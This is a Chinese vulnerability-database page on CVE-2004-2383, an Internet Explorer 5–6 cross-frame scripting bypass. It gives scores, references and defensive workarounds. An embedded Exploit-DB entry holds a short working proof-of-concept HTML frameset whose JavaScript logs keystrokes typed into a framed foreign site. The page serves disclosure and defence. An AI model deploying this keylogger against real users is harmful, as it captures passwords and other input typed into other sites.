CVE-2004-2383
CVSS5.1
发布时间 :2004-12-31 00:00:00
修订时间 :2008-09-05 16:43:58
NMCOE    

[原文]Microsoft Internet Explorer 5.0 through 6.0 allows remote attackers to bypass cross-frame scripting restrictions and capture keyboard events from other domains via an HTML document with Javascript that is outside a frameset that includes the target domain, then forcing the frameset to maintain focus. NOTE: the discloser claimed that the vendor does not categorize this as a vulnerability, but it can be used in a spoofing scenario; the discloser provides alternate scenarios. Spoofing scenarios are currently included in CVE.


[CNNVD]Microsoft Internet Explorer跨帧脚本限制绕过漏洞(CNNVD-200412-571)

        
        Microsoft Internet Explorer是一款流行的WEB浏览器。
        Microsoft Internet Explorer存在一个访问验证错误,远程攻击者可以利用这个漏洞可绕过跨帧脚本限制,盲目的'受信'的执行恶意脚本。
        问题是由于IE事件处理函数中的不充分限制。根据Microsoft Knowledge Base Article 167796( http://support.microsoft.com/support/kb/articles/Q167/7/96.asp ),在不同域中的帧访问必须限制。但是通过构建包含恶意JavaScript的帧定义,可绕过帧访问限制。
        攻击者可以诱骗用户连接包含恶意帧的页面来利用这个漏洞。获得敏感信息,或者受信情况下访问伪造页面。
        

- CVSS (基础分值)

CVSS分值: 5.1 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:microsoft:ie:5.5Microsoft ie 5.5
cpe:/a:microsoft:ie:6.0:sp1
cpe:/a:microsoft:ie:5.5:sp1Microsoft Internet Explorer 5.5 SP1
cpe:/a:microsoft:ie:5.5:sp2Microsoft Internet Explorer 5.5 SP2
cpe:/a:microsoft:ie:6.0Microsoft Internet Explorer 6.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2383
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2383
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-571
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/15337
(UNKNOWN)  XF  ie-frame-domain-bypass(15337)
http://www.securityfocus.com/bid/9761
(UNKNOWN)  BID  9761
http://www.idefense.com/application/poi/display?id=77&type=vulnerabilities&flashstatus=false
(UNKNOWN)  IDEFENSE  20040227 Microsoft Internet Explorer Cross Frame Scripting Restriction Bypass

- 漏洞信息

Microsoft Internet Explorer跨帧脚本限制绕过漏洞
中危 访问验证错误
2004-12-31 00:00:00 2005-10-20 00:00:00
远程  
        
        Microsoft Internet Explorer是一款流行的WEB浏览器。
        Microsoft Internet Explorer存在一个访问验证错误,远程攻击者可以利用这个漏洞可绕过跨帧脚本限制,盲目的'受信'的执行恶意脚本。
        问题是由于IE事件处理函数中的不充分限制。根据Microsoft Knowledge Base Article 167796( http://support.microsoft.com/support/kb/articles/Q167/7/96.asp ),在不同域中的帧访问必须限制。但是通过构建包含恶意JavaScript的帧定义,可绕过帧访问限制。
        攻击者可以诱骗用户连接包含恶意帧的页面来利用这个漏洞。获得敏感信息,或者受信情况下访问伪造页面。
        

- 公告与补丁

        厂商补丁:
        Microsoft
        ---------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.microsoft.com/windows/ie/default.asp

- 漏洞信息 (23766)

Microsoft Internet Explorer 5/6 Cross-Domain Event Leakage Vulnerability (EDBID:23766)
windows remote
2004-02-27 Verified
0 iDefense
N/A [点击下载]
source: http://www.securityfocus.com/bid/9761/info

Microsoft Internet Explorer is reported to be prone to an issue that may leak sensitive information across foreign domains.

This issue could permit framesets in different domains to leak various events, including keyboard events. This could effectively permit a hostile web page to capture keystrokes from a foreign domain. 

<html>
<head><title>IE Cross Frame Scripting Restriction Bypass Example</title>
<script>
var keylog='';
document.onkeypress = function () {
k = window.event.keyCode;
window.status = keylog += String.fromCharCode(k) + '[' + k +']';
}
</script>
</head>
<frameset onLoad="this.focus();" onBlur="this.focus();" cols="100%,*">
<frame src="http://www.example.com" scrolling="auto">
</frameset>
</html> 		

- 漏洞信息

4078
Microsoft IE Cross Frame Scripting Restriction Bypass
Remote / Network Access Input Manipulation, Other
Loss of Integrity
Exploit Public

- 漏洞描述

Microsoft Internet Explorer contains a flaw that may allow a malicious user to bypass certain frame restrictions (aka Cross Frame Scripting aka XFS). The issue is triggered when access validation errors occur within event handling routines. Malicious JavaScript loaded in a parent frame can then record the keyboard events of child frames.

- 时间线

2004-02-27 Unknow
2004-02-27 Unknow

- 解决方案

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workarounds: You must implement two workarounds in order to fully protect your sensitive forms from any XFS attack scenario. Workaround Part 1: The following piece of JavaScript should be loaded on the top of all sensitive forms (login, forgot password, registration etc.). This JavaScript will prevent parent frames from loading your sensitive forms into a child frame. if (top != self) { top.location=self.location; } Workaround Part 2: Internet Explorer 6.x has a little known feature that allows parents frames to call child frames and put them into the restricted zone by specifying security="restricted" in the frame src code. By loading the frame into the restricted zone this disables cookies and active scripting for that child frame. Example: <frame src="http://www.osvdb.org" scrolling="auto" security="restricted"> Due to this feature the workaround implemented in part 1 is disabled and thus the JavaScript code is not effective in breaking out of the child frame. The parent frame however still has the ability to use scripting code thus malicious JavaScript can record the keyboard events of the child frame. Applications can protect against this by implementing one of two things. All sensitive forms should do a cookie check to ensure that cookies are enabled in the client browser before displaying the sensitive forms to the user. If the form is loaded into a child frame and placed into the restricted zone the cookie check will fail because cookies are disabled in the restricted zone. Redirect the user if cookies are disabled to an error message saying cookies are a requirement of the use of your application. OR Another alternative is to write your sensitive form fields using JavaScript. If the child frame is infact loaded in a restricted zone, the sensitive form would not build because active scripting is disabled in this zone. This requires a lot more code for each sensitive form you are trying to protect. Note: Microsoft has stated that Internet Explorer 7 will not be available to users who are on the Windows 2000 and below platforms. This means users on these platforms will be using Internet Explorer 6 and be vulnerable to these types of attacks.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站